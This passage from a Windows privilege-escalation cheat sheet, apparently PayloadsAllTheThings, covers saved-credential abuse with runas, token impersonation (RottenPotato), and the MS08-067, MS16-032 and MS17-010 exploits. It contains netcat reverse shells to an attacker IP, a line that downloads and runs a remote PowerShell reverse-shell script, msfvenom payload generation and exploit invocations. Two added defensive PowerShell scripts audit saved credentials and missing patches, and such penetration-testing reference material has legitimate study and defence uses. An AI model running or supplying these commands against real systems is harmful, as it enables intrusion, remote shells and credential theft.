Then you can use `runas` with the `/savecred` option to run a program with the saved credentials.
The following example runs a remote binary from an SMB share.
```powershell
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"
```
Using `runas` with a provided set of credentials.
```powershell
C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"
```
```powershell
$secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)
$computer = "<hostname>"
# Process.Start(fileName, arguments, userName, password, domain)
[System.Diagnostics.Process]::Start("C:\users\public\nc.exe","<attacker_ip> 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer)
```
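Saved credentials are easy to list on one host but tedious to review across many. The following is an added example, not code from PayloadsAllTheThings: it parses `cmdkey /list` output into objects and flags the "Domain Password" entries, which are the kind `runas /savecred` stores and reuses. The sample input is the output shown above, embedded as a constructed string so the parser runs offline; the function name is my own.

```powershell
# Added example (not from PayloadsAllTheThings): turn `cmdkey /list` output into objects
# so saved credentials that `runas /savecred` could reuse can be reviewed and cleaned up.

# Constructed sample: the cmdkey output shown on this page.
$SampleCmdkeyOutput = @'
Currently stored credentials:

    Target: Domain:interactive=WORKGROUP\Administrator
    Type: Domain Password
    User: WORKGROUP\Administrator

'@

function ConvertFrom-CmdkeyList {
    param([Parameter(Mandatory)][string[]]$Lines)
    $entries = @()
    $current = $null
    foreach ($line in $Lines) {
        $t = $line.Trim()
        if ($t -match '^Target:\s*(.+)$') {
            # A new "Target:" line starts a new entry; flush the previous one.
            if ($null -ne $current) { $entries += $current }
            $current = [ordered]@{ Target = $Matches[1]; Type = $null; User = $null }
        } elseif (($null -ne $current) -and ($t -match '^Type:\s*(.+)$')) {
            $current.Type = $Matches[1]
        } elseif (($null -ne $current) -and ($t -match '^User:\s*(.+)$')) {
            $current.User = $Matches[1]
        }
    }
    if ($null -ne $current) { $entries += $current }
    foreach ($e in $entries) {
        [pscustomobject]@{
            Target       = $e.Target
            Type         = $e.Type
            User         = $e.User
            # "Domain Password" entries are the Windows credentials runas /savecred reuses.
            SavecredRisk = ($e.Type -eq 'Domain Password')
        }
    }
}

$creds = ConvertFrom-CmdkeyList -Lines ($SampleCmdkeyOutput -split "`r?`n")
$creds | Format-Table -AutoSize
# On a live host: ConvertFrom-CmdkeyList -Lines (cmdkey /list)
```

Entries with `SavecredRisk` set, especially ones whose `User` is an administrator, are the ones worth removing with `cmdkey /delete` or, more durably, preventing through the "Network access: Do not allow storage of passwords and credentials for network authentication" security policy.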
## EoP - Common Vulnerabilities and Exposures
### Token Impersonation (RottenPotato)
Binary available at: https://github.com/foxglovesec/RottenPotato
Binary available at: https://github.com/breenmachine/RottenPotatoNG
```powershell
# from a Meterpreter session
getuid
getprivs
use incognito
list_tokens -u
cd c:\temp\
execute -Hc -f ./rot.exe
impersonate_token "NT AUTHORITY\SYSTEM"
```
```powershell
Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"
```
### MS08-067 (NetAPI)
Check the vulnerability with the following nmap script.
```bash
nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms08-067 <ip_netblock>
```
Metasploit modules to exploit `MS08-067 NetAPI`.
```powershell
exploit/windows/smb/ms08_067_netapi
```
If you can't use Metasploit and only want a reverse shell.
```bash
# exploit script
# https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py
# generate the "shellcode" Python variable the script expects
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows
# usage (from the script's help, which names itself MS08_067_2018.py): <target ip> <os option> <port>
#   1 - Windows XP SP0/SP1 Universal, port 445
#   2 - Windows 2000 Universal, port 139 (445 could also be used)
#   3 - Windows 2003 SP0 Universal
#   4 - Windows 2003 SP1 English
#   5 - Windows XP SP3 French (NX)
#   6 - Windows XP SP3 English (NX)
#   7 - Windows XP SP3 English (AlwaysOn NX)
python ms08-067.py 10.0.0.1 6 445
```
### MS10-015 (KiTrap0D) - Microsoft Windows NT/2000/2003/2008/XP/Vista/7
'KiTrap0D' User Mode to Ring Escalation (MS10-015)
```powershell
https://www.exploit-db.com/exploits/11199
Metasploit: exploit/windows/local/ms10_015_kitrap0d
```
### MS11-080 (afd.sys) - Microsoft Windows XP/2003
```powershell
Python: https://www.exploit-db.com/exploits/18176
Metasploit: exploit/windows/local/ms11_080_afdjoinleaf
```
### MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
Check whether the patch is installed: `wmic qfe list | findstr "3139914"`
```powershell
PowerShell:
https://www.exploit-db.com/exploits/39719/
https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1
Binary exe: https://github.com/Meatballs1/ms16-032
Metasploit: exploit/windows/local/ms16_032_secondary_logon_handle_privesc
```
### MS17-010 (Eternal Blue)
Check the vulnerability with the following nmap script.
```bash
nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010 <ip_netblock>
```
Metasploit modules to exploit `EternalRomance/EternalSynergy/EternalChampion`.
```powershell
auxiliary/admin/smb/ms17_010_command MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
auxiliary/scanner/smb/smb_ms17_010 MS17-010 SMB RCE Detection
exploit/windows/smb/ms17_010_eternalblue MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
exploit/windows/smb/ms17_010_eternalblue_win8 MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
exploit/windows/smb/ms17_010_psexec MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
```
If you can't use Metasploit and only want a reverse shell.
```bash
git clone https://github.com/helviojunior/MS17-010
cd MS17-010
# generate a simple reverse shell to use
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o revshell.exe
python2 send_and_execute.py 10.0.0.1 revshell.exe
```
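The `wmic qfe list | findstr "3139914"` check in the MS16-032 section generalizes to every KB number named on this page, and MS17-010 additionally depends on SMBv1 being enabled. The block below is an added example, not code from PayloadsAllTheThings: it runs the `Get-HotFix` equivalent of that check over the KBs from the kernel-exploit list and the section headings above, and reports the SMBv1 server state. The catalog and function names are my own; the KB numbers and issue labels are the page's. A missing KB is a prompt to verify, not proof of exposure, because superseding cumulative updates, OS version and SKU all affect whether a given KB ever applied.

```powershell
# Added example (not from PayloadsAllTheThings): Get-HotFix based version of
# `wmic qfe list | findstr "3139914"`, run over the KB numbers this page lists,
# plus the SMBv1 state that MS17-010 depends on.

$KnownPatches = @(
    [pscustomobject]@{ Bulletin = 'MS16-032'; KB = @('KB3139914', 'KB3143141'); Issue = 'Secondary Logon Handle' }
    [pscustomobject]@{ Bulletin = 'MS16-034'; KB = @('KB3143145');              Issue = 'Kernel Driver' }
    [pscustomobject]@{ Bulletin = 'MS16-075'; KB = @('KB3164038');              Issue = 'Hot Potato' }
    [pscustomobject]@{ Bulletin = 'MS16-098'; KB = @('KB3178466');              Issue = 'Kernel Driver' }
    [pscustomobject]@{ Bulletin = 'MS16-111'; KB = @('KB3186973');              Issue = 'kernel api' }
    [pscustomobject]@{ Bulletin = 'MS16-135'; KB = @('KB3199135');              Issue = 'Windows Kernel Mode Drivers' }
    [pscustomobject]@{ Bulletin = 'MS17-010'; KB = @('KB4013389');              Issue = 'SMBv1 (EternalBlue)' }
)

function Get-KnownPatchStatus {
    param([object[]]$Catalog = $KnownPatches)
    # HotFixID is the "KBnnnnnnn" string Get-HotFix (like wmic qfe) reports per installed update.
    $installed = @(Get-HotFix | Select-Object -ExpandProperty HotFixID)
    foreach ($entry in $Catalog) {
        $present = @($entry.KB | Where-Object { $installed -contains $_ })
        [pscustomobject]@{
            Bulletin  = $entry.Bulletin
            Issue     = $entry.Issue
            Installed = ($present.Count -gt 0)
            Matched   = ($present -join ',')
        }
    }
}

function Test-Smb1Enabled {
    # Get-SmbServerConfiguration exists on Windows 8 / Server 2012 and later. Older hosts
    # (the ones most exposed to MS17-010) return $null here; on those, check the DWORD
    # HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\SMB1 instead (0 = disabled).
    $cfg = Get-SmbServerConfiguration -ErrorAction SilentlyContinue
    if ($null -eq $cfg) { return $null }
    return [bool]$cfg.EnableSMB1Protocol
}

Get-KnownPatchStatus | Sort-Object Installed | Format-Table -AutoSize
$smb1 = Test-Smb1Enabled
if ($smb1 -eq $true) {
    Write-Warning 'SMBv1 is enabled; MS17-010 is reachable if KB4013389 (or a superseding update) is missing.'
}
```

Run it as an ordinary user: `Get-HotFix` and `Get-SmbServerConfiguration` both work without elevation, so the script fits into a login script or a remote `Invoke-Command` sweep across hosts.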
## References
* [Windows Internals Book - 02/07/2017](https://docs.microsoft.com/en-us/sysinternals/learn/windows-internals)
* [icacls - Docs Microsoft](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/icacls)
* [Privilege Escalation Windows - Philip Linghammar](https://xapax.gitbooks.io/security/content/privilege_escalation_windows.html)
* [Windows elevation of privileges - Guifre Ruiz](https://guif.re/windowseop)
* [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/)
* [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
* [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)
* [TOP10 ways to boost your privileges in Windows systems - hackmag](https://hackmag.com/security/elevating-privileges-to-administrative-and-further/)
* [The SYSTEM Challenge](https://decoder.cloud/2017/02/21/the-system-challenge/)
* [Windows Privilege Escalation Guide - absolomb's security blog](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
* [Chapter 4 - Windows Post-Exploitation - 2 Nov 2017 - dostoevskylabs](https://github.com/dostoevskylabs/dostoevsky-pentest-notes/blob/master/chapter-4.md)
* [Remediation for Microsoft Windows Unquoted Service Path Enumeration Vulnerability - September 18th, 2016 - Robert Russell](https://www.tecklyfe.com/remediation-microsoft-windows-unquoted-service-path-enumeration-vulnerability/)
* [Pentestlab.blog - WPE-01 - Stored Credentials](https://pentestlab.blog/2017/04/19/stored-credentials/)
* [Pentestlab.blog - WPE-02 - Windows Kernel](https://pentestlab.blog/2017/04/24/windows-kernel-exploits/)
* [Pentestlab.blog - WPE-03 - DLL Injection](https://pentestlab.blog/2017/04/04/dll-injection/)
* [Pentestlab.blog - WPE-04 - Weak Service Permissions](https://pentestlab.blog/2017/03/30/weak-service-permissions/)
* [Pentestlab.blog - WPE-05 - DLL Hijacking](https://pentestlab.blog/2017/03/27/dll-hijacking/)
* [Pentestlab.blog - WPE-06 - Hot Potato](https://pentestlab.blog/2017/04/13/hot-potato/)
* [Pentestlab.blog - WPE-07 - Group Policy Preferences](https://pentestlab.blog/2017/03/20/group-policy-preferences/)
* [Pentestlab.blog - WPE-08 - Unquoted Service Path](https://pentestlab.blog/2017/03/09/unquoted-service-path/)
* [Pentestlab.blog - WPE-09 - Always Install Elevated](https://pentestlab.blog/2017/02/28/always-install-elevated/)
* [Pentestlab.blog - WPE-10 - Token Manipulation](https://pentestlab.blog/2017/04/03/token-manipulation/)
* [Pentestlab.blog - WPE-11 - Secondary Logon Handle](https://pentestlab.blog/2017/04/07/secondary-logon-handle/)
* [Pentestlab.blog - WPE-12 - Insecure Registry Permissions](https://pentestlab.blog/2017/03/31/insecure-registry-permissions/)
* [Pentestlab.blog - WPE-13 - Intel SYSRET](https://pentestlab.blog/2017/06/14/intel-sysret/)
* [Alternative methods of becoming SYSTEM - 20th November 2017 - Adam Chester @_xpn_](https://blog.xpnsec.com/becoming-system/)